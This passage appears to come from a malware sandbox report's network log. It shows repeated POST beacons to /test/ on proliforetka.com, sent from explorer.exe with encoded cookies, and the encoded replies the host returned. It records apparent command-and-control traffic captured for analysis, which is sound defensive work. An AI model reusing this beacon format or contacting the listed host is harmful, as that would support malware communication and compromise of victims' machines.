                                                                                                                                Cookie: zQQrf4YZ+DX3LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:19 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:19 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EkHyiOA4Ey7%2FatLkcGbh2JL17gN8iiu7FFeJUa%2FQd958SXyqqi4eC6yuhYduXUkzEJqueURnW30LJ0KElwfON3QCrGyK6ED63keGT%2BNufFto6o%2BBecW1YMMq0WqG7xlMrvxc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38750cdfa5d145-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81602&min_rtt=81272&rtt_var=30713&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=35928&cwnd=32&unsent_bytes=0&cid=d9c3a72d82fb0054&ts=700&x=0"
                                                                                                                                2024-12-17 16:58:19 UTC347INData Raw: 31 35 34 0d 0a 6d 46 74 72 49 73 46 50 76 31 66 38 4a 4a 49 32 68 6a 4a 4b 47 33 72 4d 68 4f 74 57 71 45 75 7a 46 55 52 62 67 58 62 65 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 58 49 33 39 68 39 51 54 52 6a 36 39 48 41 49 50 42 43 30 48 5a 48 78 48 71 5a 43 44 36 35 63 75 66 66 77 44 35 62 62 62 33 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 50 58 67 44 6f 51 6b 50 4a 56 54 36 52 36 61 4e 30 76 54 74 73 79 6d 4f 45 6d 68 50 4e 38 74 78 69 6d 4f 59 76 5a 6d 66 37 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mFtrIsFPv1f8JJI2hjJKG3rMhOtWqEuzFURbgXbeBwLp5exDOPARyFkPbnOXI39h9QTRj69HAIPBC0HZHxHqZCD65cuffwD5bbb3Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TPXgDoQkPJVT6R6aN0vTtsymOEmhPN8tximOYvZmf7BDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.650027172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:21 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:21 UTC818INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:21 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ%2Fu9ZIqjabnujeq30ifYVrEC%2Bhj9J8TgMWhvfgN4XTgF%2B9llI7UTh4ywogr7rTWdzjDLTBiTSAc13uyP%2FQF6a3CHx5zB4PLr%2FZTefbgc%2BBavKWRw0V779a7NE%2BpHIqyAj4C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38751d0f15d383-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81252&min_rtt=81247&rtt_var=30478&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=35920&cwnd=32&unsent_bytes=0&cid=444bcd34760bde48&ts=692&x=0"
                                                                                                                                2024-12-17 16:58:21 UTC347INData Raw: 31 35 34 0d 0a 6e 31 39 74 49 73 46 45 73 31 66 7a 4a 5a 59 30 68 44 64 47 47 33 44 4a 67 4f 68 57 72 55 43 7a 47 6b 68 58 67 33 50 59 41 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 4a 33 68 72 39 77 54 58 6a 36 78 48 44 34 4c 41 44 55 54 5a 45 68 66 6c 59 79 33 2b 35 73 75 64 65 41 76 30 61 37 48 37 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 44 6c 41 6f 4d 67 4f 70 56 54 36 42 2b 53 4e 30 6e 59 74 73 36 6f 4e 6b 6d 6c 4f 64 77 74 78 79 75 4f 61 50 68 67 65 72 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154n19tIsFEs1fzJZY0hDdGG3DJgOhWrUCzGkhXg3PYAwLp5exDOPARyFkPbnOVJ3hr9wTXj6xHD4LADUTZEhflYy3+5sudeAv0a7H7Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPDlAoMgOpVT6B+SN0nYts6oNkmlOdwtxyuOaPhgerBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.650029172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:23 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:24 UTC817INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:23 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bDF6NDnMJ3i9tBv97Oc2InLG%2Bld0K870tsxK5G%2FDcfwUMSilNBG8S6XAaRuGTvJAN91NY%2BxTGPr%2F%2FZcJ9wUP4HrGWgaTU6qq8xt2zNO2UU60d%2FTh52ysPUL%2BmzqlKyR9PO8L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387529eff58cab-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2041&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1407228&cwnd=240&unsent_bytes=0&cid=2ccf55ba1e122bf6&ts=765&x=0"
                                                                                                                                2024-12-17 16:58:24 UTC343INData Raw: 31 35 30 0d 0a 6e 56 68 71 49 38 52 45 75 31 66 39 49 5a 41 33 68 54 70 44 47 33 33 4d 67 65 31 51 72 55 32 7a 47 30 42 65 67 6e 4c 64 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 55 4c 33 74 67 38 51 4f 34 35 61 35 43 41 34 58 43 43 51 2b 63 47 52 6a 6a 5a 79 75 54 35 71 65 51 65 77 44 36 61 66 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 6a 50 51 66 62 6e 42 59 4e 50 4f 66 6c 64 36 68 57 62 4d 77 58 54 2b 38 79 73 4f 55 2b 6f 56 4e 39 41 78 43 71 4a 59 2f 63 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 7a 50 50
                                                                                                                                Data Ascii: 150nVhqI8REu1f9IZA3hTpDG33Mge1QrU2zG0BegnLdBwLp5exDOPARyFkPbnOUL3tg8QO45a5CA4XCCQ+cGRjjZyuT5qeQewD6af/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxjPQfbnBYNPOfld6hWbMwXT+8ysOU+oVN9AxCqJY/coQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgzPP
                                                                                                                                2024-12-17 16:58:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                35192.168.2.650030172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:25 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:26 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g9m0ztJ2TacYSn%2BHbN5k5NYZ1cZUklmMIJX2Q8zN5AQ6Q4ditxkPn6hsOeae57WCFEeRRbyDHH%2FKGk9myD4ieOk9lv6VV5k5ORWSSsKpkQhH8Thx08gCyhBUoJZ%2F7jKE2HOp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875384afed3b7-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81104&min_rtt=81090&rtt_var=30436&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=35959&cwnd=32&unsent_bytes=0&cid=60209e9ed4c50d44&ts=707&x=0"
                                                                                                                                2024-12-17 16:58:26 UTC347INData Raw: 31 35 34 0d 0a 6d 46 4e 76 4a 4d 52 4f 75 56 66 79 4c 5a 59 36 69 44 4e 42 47 33 2f 44 67 65 68 57 72 6b 43 7a 47 45 52 57 67 33 62 66 42 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 57 4a 58 74 67 38 51 4b 34 36 4b 5a 4f 41 34 50 46 44 77 2b 63 47 42 48 72 59 43 6e 2b 6a 36 57 63 63 51 6e 38 62 37 57 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 41 51 66 50 6e 41 34 49 69 56 50 31 56 34 42 36 58 4d 30 6d 63 38 38 79 74 50 55 69 69 50 62 52 42 79 53 6d 4d 62 76 6c 68 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 50 50
                                                                                                                                Data Ascii: 154mFNvJMROuVfyLZY6iDNBG3/DgehWrkCzGERWg3bfBQLp5exDOPARyFkPbnOWJXtg8QK46KZOA4PFDw+cGBHrYCn+j6WccQn8b7WyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvAQfPnA4IiVP1V4B6XM0mc88ytPUiiPbRBySmMbvlhMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IPP
                                                                                                                                2024-12-17 16:58:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                36192.168.2.650031172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:27 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:28 UTC809INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqirYa%2BwMUQbUw7Obak5AOnFY8MLmhMgvMX6OkFycvrU2trgrrrooQlKMZRIRbwy9asej6v3%2FBV1dykuF7RXCjhkPNljcteAsv95nJDDbdQk1guZVVae%2B0Q54XgVNxFoLw3j"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387544aba84239-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1715&rtt_var=707&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1479979&cwnd=229&unsent_bytes=0&cid=4d0f594861c51d77&ts=703&x=0"
                                                                                                                                2024-12-17 16:58:28 UTC347INData Raw: 31 35 34 0d 0a 6d 46 70 73 4b 63 46 49 75 46 66 39 49 70 49 79 68 44 42 4c 47 33 33 4d 67 2b 4e 52 71 6b 2b 7a 47 30 52 66 68 58 6e 62 42 77 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 49 6e 6c 6f 38 51 50 52 6a 36 78 43 41 49 48 49 44 6b 4c 5a 47 52 66 6d 5a 53 44 34 34 63 75 63 65 51 6a 30 62 4c 66 37 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 52 2f 44 6c 42 34 59 68 4f 70 56 58 36 52 47 58 4f 6b 36 63 2b 38 4b 71 50 45 36 68 4f 37 52 47 77 53 75 4f 62 76 35 68 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 66
                                                                                                                                Data Ascii: 154mFpsKcFIuFf9IpIyhDBLG33Mg+NRqk+zG0RfhXnbBwLp5exDOPARyFkPbnOTInlo8QPRj6xCAIHIDkLZGRfmZSD44cuceQj0bLf7Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9R/DlB4YhOpVX6RGXOk6c+8KqPE6hO7RGwSuObv5hMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMf
                                                                                                                                2024-12-17 16:58:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                37192.168.2.650032172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:29 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:30 UTC809INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bGaMJy8Z6pCbSh%2FjuqtlSgi18wVMKJFxD%2FalsF2KbdSUGCfenvb3u3PFWieF%2BO4PzRxh59rI3B357FqH7A5EDJju9k9VbroomiBOAuUF0dE4t0ZnrsLE9yzJuO5BwV3WZbhm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875515b46de97-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1705&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1692753&cwnd=228&unsent_bytes=0&cid=f4f5367a940f301e&ts=760&x=0"
                                                                                                                                2024-12-17 16:58:30 UTC347INData Raw: 31 35 34 0d 0a 6e 56 70 71 49 73 70 4b 76 46 66 39 4a 4a 59 33 67 54 5a 4b 47 33 44 43 68 75 4a 57 72 6b 79 7a 47 30 4e 59 68 33 50 62 42 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 55 4a 33 42 76 39 41 37 58 6a 36 31 4f 42 6f 76 48 44 55 66 5a 48 78 58 6b 59 69 6e 35 34 73 75 65 65 77 44 2b 61 4c 72 36 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 2f 54 73 41 34 51 6b 4f 4a 56 58 37 78 36 52 4d 30 76 57 74 73 32 72 4f 30 71 6d 4f 37 52 48 79 43 32 49 59 76 5a 69 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 50 66
                                                                                                                                Data Ascii: 154nVpqIspKvFf9JJY3gTZKG3DChuJWrkyzG0NYh3PbBALp5exDOPARyFkPbnOUJ3Bv9A7Xj61OBovHDUfZHxXkYin54sueewD+aLr6Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9Q/TsA4QkOJVX7x6RM0vWts2rO0qmO7RHyC2IYvZiMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IPf
                                                                                                                                2024-12-17 16:58:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                38192.168.2.650034172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:31 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:32 UTC812INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGFTomKzhOi4dywmNqL1A48YsMQGqD5i%2FuS2qdn7qw6FKS42WD9YnNnhAEY59otALT2EVMVy%2FxW34peu4bEGn7vndmgB0uJYivI%2FFGzfgCKWF6%2FLKuguDblGlJv%2Bv2qP8gTa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38755e2b694344-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2346&min_rtt=2314&rtt_var=932&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1135303&cwnd=47&unsent_bytes=0&cid=32c48a1afc358850&ts=729&x=0"
                                                                                                                                2024-12-17 16:58:32 UTC347INData Raw: 31 35 34 0d 0a 6d 6c 4e 75 49 73 4a 4d 76 56 66 32 49 5a 59 77 69 54 70 4b 47 33 7a 4d 69 65 74 53 72 45 32 7a 47 30 6c 66 68 6e 66 66 42 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 57 49 48 78 70 38 51 50 55 6a 36 70 47 42 49 66 46 42 30 76 5a 47 42 6e 72 61 79 37 34 34 4d 75 66 66 41 76 30 62 37 44 33 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 58 73 41 49 30 6b 50 70 56 54 36 68 36 61 4e 6b 2f 53 74 73 69 76 50 55 6d 69 50 39 34 74 77 69 71 4c 62 66 70 67 66 37 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mlNuIsJMvVf2IZYwiTpKG3zMietSrE2zG0lfhnffBALp5exDOPARyFkPbnOWIHxp8QPUj6pGBIfFB0vZGBnray744MuffAv0b7D3Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPXsAI0kPpVT6h6aNk/StsivPUmiP94twiqLbfpgf7BDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                39192.168.2.650035172.67.161.604434004C:\Windows\explorer.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:34 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:35 UTC817INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
